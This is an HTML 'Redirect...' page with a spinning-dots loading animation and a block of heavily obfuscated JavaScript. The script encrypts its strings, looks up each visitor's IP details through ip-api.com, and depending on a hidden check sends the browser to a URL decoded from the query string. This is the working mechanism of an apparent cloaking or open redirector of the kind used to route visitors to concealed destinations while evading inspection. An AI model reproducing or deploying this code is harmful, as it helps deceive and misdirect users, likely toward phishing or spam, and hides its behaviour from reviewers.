<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Redirect...</title>
    <style>
        body {
            background: #222;
        }
        figure {
            position: absolute;
            margin: auto;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            width: 6.250em;
            height: 6.250em;
            animation: rotate 2.4s linear infinite;
        }
        .white {
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            background: white;
            animation: flash 2.4s linear infinite;
            opacity: 0;
        }
        .dot {
            position: absolute;
            margin: auto;
            width: 2.4em;
            height: 2.4em;
            border-radius: 100%;
            transition: all 1s ease;
        }
        .dot:nth-child(2) {
            top: 0;
            bottom: 0;
            left: 0;
            background: #FF4444;
            animation: dotsY 2.4s linear infinite;
        }
        .dot:nth-child(3) {
            left: 0;
            right: 0;
            top: 0;
            background: #FFBB33;
            animation: dotsX 2.4s linear infinite;
        }
        .dot:nth-child(4) {
            top: 0;
            bottom: 0;
            right: 0;
            background: #99CC00;
            animation: dotsY 2.4s linear infinite;
        }
        .dot:nth-child(5) {
            left: 0;
            right: 0;
            bottom: 0;
            background: #33B5E5;
            animation: dotsX 2.4s linear infinite;
        }
        @keyframes rotate {
            0% {
                transform: rotate(0);
            }
            10% {
                width: 6.250em;
                height: 6.250em;
            }
            66% {
                width: 2.4em;
                height: 2.4em;
            }
            100% {
                transform: rotate(360deg);
                width: 6.250em;
                height: 6.250em;
            }
        }
        @keyframes dotsY {
            66% {
                opacity: .1;
                width: 2.4em;
            }
            77% {
                opacity: 1;
                width: 0;
            }
        }
        @keyframes dotsX {
            66% {
                opacity: .1;
                height: 2.4em;
            }
            77% {
                opacity: 1;
                height: 0;
            }
        }
        @keyframes flash {
            33% {
                opacity: 0;
                border-radius: 0%;
            }
            55% {
                opacity: .6;
                border-radius: 100%;
            }
            66% {
                opacity: 0;
            }
        }
    </style>
</head>
<body>
<figure>
    <div class="dot white"></div>
    <div class="dot"></div>
    <div class="dot"></div>
    <div class="dot"></div>
    <div class="dot"></div>
</figure>
<script src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-3.5.0.min.js"></script>
<script>
    var _0xodL='jsjiami.com.v6',_0xodL_=['‮_0xodL'],_0x26dc=[_0xodL,'w57CtcK8wrPDrA==','w6YDw64RwqFr','W8KXLznDpg==','BR7DucKhw58=','w50Kw5DCiUU=','SSQYwp0cbkYpwp4=','w5Y0Uj3Chg==','w4Ekw6fCjFw=','dgcvwpon','wo5Nw5PDqE9rwqbCi8OJw6LChMKresO6wosQd2gKwprCr3jCqA==','wokcaQ==','ajHDqsKw','w4fDosO3Rg==','w5cJwpTCtg1iwr/CisKM','wqzDs8KHwpFT','LAnCmV13A8KM','NcK8w57DvsKo','VcOhwp3Dt8Kv','M8KVwoTCp8OC','wrnCvUINw7k=','wqU4AmEb','w4/DtX3CksOnW8Oew7Y=','FsK4w7zCowM=','w48Ww6svKw==','worCqMOTw6A=','wopWw4TDuUg4w6bDig==','DSbDpsOF','wpx3MMKgwrU=','w709XSbCtQ==','CsOhVsO+CTgjXg==','WHPDs8Ogw5E=','w6YJw6MXwqFqwpjDgQ==','w5LCrsK+Y8OMHw==','wr0pUcOgKA==','MFbCrH/Ciw==','LAvCiMKKwp7Dtw==','wrLCnHkJw4w=','w7YRUC3Cow==','w6RIwrXDm8O5','TmXCkALChA==','E8KBwqrCs8Of','Ui0Rwocg','wphPwpTClUlMw6rCow==','clHDk0Vlwq3DscKMAQ==','AjsjiyZxaWmrpJi.cMLLnbomh.v6=='];if(function(_0x18d0ae,_0x22a7a3,_0xe56b44){function _0x347b5b(_0x472198,_0x2f4be7,_0x2362e4,_0xdf646e,_0x389190,_0x1b35f6){_0x2f4be7=_0x2f4be7>>0x8,_0x389190='po';var _0x41da92='shift',_0x41e367='push',_0x1b35f6='‮';if(_0x2f4be7<_0x472198){while(--_0x472198){_0xdf646e=_0x18d0ae[_0x41da92]();if(_0x2f4be7===_0x472198&&_0x1b35f6==='‮'&&_0x1b35f6['length']===0x1){_0x2f4be7=_0xdf646e,_0x2362e4=_0x18d0ae[_0x389190+'p']();}else if(_0x2f4be7&&_0x2362e4['replace'](/[AyZxWrpJMLLnbh=]/g,'')===_0x2f4be7){_0x18d0ae[_0x41e367](_0xdf646e);}}_0x18d0ae[_0x41e367](_0x18d0ae[_0x41da92]());}return 0xcbd8b;};return _0x347b5b(++_0x22a7a3,_0xe56b44)>>_0x22a7a3^_0xe56b44;}(_0x26dc,0x1bd,0x1bd00),_0x26dc){_0xodL_=_0x26dc['length']^0x1bd;};function _0x4661(_0x5377b2,_0x5dc152){_0x5377b2=~~'0x'['concat'](_0x5377b2['slice'](0x1));var _0x1dbe53=_0x26dc[_0x5377b2];if(_0x4661['PyGfqe']===undefined){(function(){var _0x1ee5c1=typeof window!=='undefined'?window:typeof process==='object'&&typeof require==='function'&&typeof global==='object'?global:this;var _0x17375a='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1ee5c1['atob']||(_0x1ee5c1['atob']=function(_0x211356){var _0x4d1d82=String(_0x211356)['replace'](/=+$/,'');for(var _0x189db2=0x0,_0x1b767b,_0x3fcaf0,_0x1161de=0x0,_0x4baacd='';_0x3fcaf0=_0x4d1d82['charAt'](_0x1161de++);~_0x3fcaf0&&(_0x1b767b=_0x189db2%0x4?_0x1b767b*0x40+_0x3fcaf0:_0x3fcaf0,_0x189db2++%0x4)?_0x4baacd+=String['fromCharCode'](0xff&_0x1b767b>>(-0x2*_0x189db2&0x6)):0x0){_0x3fcaf0=_0x17375a['indexOf'](_0x3fcaf0);}return _0x4baacd;});}());function _0x413d03(_0xa015f8,_0x5dc152){var _0x3c3740=[],_0x2d80b4=0x0,_0x5b64e5,_0x1e05ea='',_0x55b095='';_0xa015f8=atob(_0xa015f8);for(var _0x4f8d1e=0x0,_0x4c433b=_0xa015f8['length'];_0x4f8d1e<_0x4c433b;_0x4f8d1e++){_0x55b095+='%'+('00'+_0xa015f8['charCodeAt'](_0x4f8d1e)['toString'](0x10))['slice'](-0x2);}_0xa015f8=decodeURIComponent(_0x55b095);for(var _0x1da4c4=0x0;_0x1da4c4<0x100;_0x1da4c4++){_0x3c3740[_0x1da4c4]=_0x1da4c4;}for(_0x1da4c4=0x0;_0x1da4c4<0x100;_0x1da4c4++){_0x2d80b4=(_0x2d80b4+_0x3c3740[_0x1da4c4]+_0x5dc152['charCodeAt'](_0x1da4c4%_0x5dc152['length']))%0x100;_0x5b64e5=_0x3c3740[_0x1da4c4];_0x3c3740[_0x1da4c4]=_0x3c3740[_0x2d80b4];_0x3c3740[_0x2d80b4]=_0x5b64e5;}_0x1da4c4=0x0;_0x2d80b4=0x0;for(var _0x2bbb89=0x0;_0x2bbb89<_0xa015f8['length'];_0x2bbb89++){_0x1da4c4=(_0x1da4c4+0x1)%0x100;_0x2d80b4=(_0x2d80b4+_0x3c3740[_0x1da4c4])%0x100;_0x5b64e5=_0x3c3740[_0x1da4c4];_0x3c3740[_0x1da4c4]=_0x3c3740[_0x2d80b4];_0x3c3740[_0x2d80b4]=_0x5b64e5;_0x1e05ea+=String['fromCharCode'](_0xa015f8['charCodeAt'](_0x2bbb89)^_0x3c3740[(_0x3c3740[_0x1da4c4]+_0x3c3740[_0x2d80b4])%0x100]);}return _0x1e05ea;}_0x4661['eNwzYh']=_0x413d03;_0x4661['HSCRoa']={};_0x4661['PyGfqe']=!![];}var _0x1b7382=_0x4661['HSCRoa'][_0x5377b2];if(_0x1b7382===undefined){if(_0x4661['eNpErr']===undefined){_0x4661['eNpErr']=!![];}_0x1dbe53=_0x4661['eNwzYh'](_0x1dbe53,_0x5dc152);_0x4661['HSCRoa'][_0x5377b2]=_0x1dbe53;}else{_0x1dbe53=_0x1b7382;}return _0x1dbe53;};(function(_0x3e178e,_0x1a40a4){var _0x50c58f={'xHwAz':'link','CtGUu':_0x4661('‫0','J[4h'),'VNxaw':function(_0x4f4144,_0x368ae0){return _0x4f4144===_0x368ae0;},'yVgrV':_0x4661('‫1','f7dh'),'hLkeY':function(_0x4c97a0,_0x55069e){return _0x4c97a0(_0x55069e);},'heYmJ':function(_0x2f98e0,_0x10ae9c){return _0x2f98e0(_0x10ae9c);},'RLWVl':function(_0x4d598f,_0x16377d){return _0x4d598f(_0x16377d);},'scfcJ':function(_0xba4dbd,_0x574a73){return _0xba4dbd(_0x574a73);},'gwwIM':function(_0x358b09,_0x18fd61){return _0x358b09==_0x18fd61;},'fKXIe':function(_0x199a0e,_0x5e97d8){return _0x199a0e<_0x5e97d8;},'hLkhw':function(_0x4d4920,_0x1f096c){return _0x4d4920!==_0x1f096c;},'sdzJl':_0x4661('‫2','RC[b'),'QaKfd':_0x4661('‮3','1S0^'),'OWqxm':_0x4661('‫4','AuI)'),'dQwmu':_0x4661('‫5','MOHA'),'Digwx':_0x4661('‮6','X5@4')};let _0x40bd4c;let _0x2ce2a2=_0x50c58f['OWqxm'];$[_0x4661('‮7','VdK8')]({'url':'http://ip-api.com/json','type':_0x50c58f['dQwmu'],'success':function(_0x1222be){var _0x54b3f3={'hAPWB':_0x4661('‮8','AuI)'),'cmPlB':function(_0x32bea9,_0x31e702){return _0x32bea9(_0x31e702);},'HzpjE':_0x50c58f['xHwAz']};let _0x2e88d4=_0x1222be[_0x4661('‫9','6AoZ')];if(_0x2e88d4[_0x4661('‮a','0Q@P')](_0x50c58f[_0x4661('‮b','h@kQ')])!==-0x1){if(_0x50c58f[_0x4661('‫c','R!Cn')]('BxgAi',_0x50c58f['yVgrV'])){let _0x4d552d=_0x1222be[_0x4661('‮d','SI!@')];if(_0x4d552d['indexOf'](_0x54b3f3['hAPWB'])!==-0x1){_0x40bd4c=_0x2ce2a2;}else{_0x40bd4c=_0x54b3f3[_0x4661('‫e','WRDM')](decodeURIComponent,decodeURIComponent(_0x54b3f3['cmPlB'](_0x25ae78,_0x54b3f3[_0x4661('‮f','s)Sk')])));window[_0x4661('‫10','*kZj')]['href']=_0x40bd4c;}}else{_0x40bd4c=_0x2ce2a2;}}else{_0x40bd4c=_0x50c58f[_0x4661('‮11','(&6u')](decodeURIComponent,_0x50c58f[_0x4661('‫12','SmTt')](decodeURIComponent,_0x50c58f['RLWVl'](_0x25ae78,_0x4661('‮13','96[N'))));window[_0x4661('‮14','AuI)')][_0x4661('‫15','(%g*')]=_0x40bd4c;}},'error':function(_0x4dc886){_0x40bd4c=_0x50c58f['RLWVl'](decodeURIComponent,_0x50c58f[_0x4661('‮16','lcJk')](decodeURIComponent,_0x50c58f['scfcJ'](_0x25ae78,_0x50c58f[_0x4661('‮17','f7dh')])));window[_0x4661('‫18','so*p')]['href']=_0x40bd4c;},'dataType':_0x50c58f[_0x4661('‫19','RuW(')]});function _0x25ae78(_0x270aac){let _0x53b43b=window[_0x4661('‫1a','aEh1')][_0x4661('‫1b','%dcz')]['substring'](0x1);let _0x4a389c=_0x53b43b[_0x4661('‫1c','MOHA')]('&');for(let _0x2b89d6=0x0;_0x50c58f[_0x4661('‮1d','p&GF')](_0x2b89d6,_0x4a389c[_0x4661('‫1e','x8Bk')]);_0x2b89d6++){if(_0x50c58f[_0x4661('‮1f','WRDM')](_0x50c58f[_0x4661('‫20','f7dh')],'csuhh')){let _0x3c2ca5=_0x4a389c[_0x2b89d6]['split']('=');if(_0x50c58f[_0x4661('‮21','[E1l')](_0x3c2ca5[0x0],_0x270aac)){if(_0x50c58f[_0x4661('‫22','oSKN')](_0x50c58f[_0x4661('‫23','SI!@')],_0x4661('‫24','1S0^'))){return _0x3c2ca5[0x1];}else{let _0x326373=window[_0x4661('‮25','LXnU')]['search'][_0x4661('‮26','p%2L')](0x1);let _0x5ef641=_0x326373[_0x4661('‮27','AwLW')]('&');for(let _0x20b25c=0x0;_0x20b25c<_0x5ef641[_0x4661('‮28','aEh1')];_0x20b25c++){let _0x1efe91=_0x5ef641[_0x20b25c][_0x4661('‮29','NoJ@')]('=');if(_0x1efe91[0x0]==_0x270aac){return _0x1efe91[0x1];}}return _0x2ce2a2;}}}else{let _0x493ed2=_0x4a389c[_0x2b89d6][_0x4661('‫2a','[O@X')]('=');if(_0x50c58f[_0x4661('‫2b',']58q')](_0x493ed2[0x0],_0x270aac)){return _0x493ed2[0x1];}}}return _0x2ce2a2;}}(window,document));;_0xodL='jsjiami.com.v6';
</script>
</body>
</html>
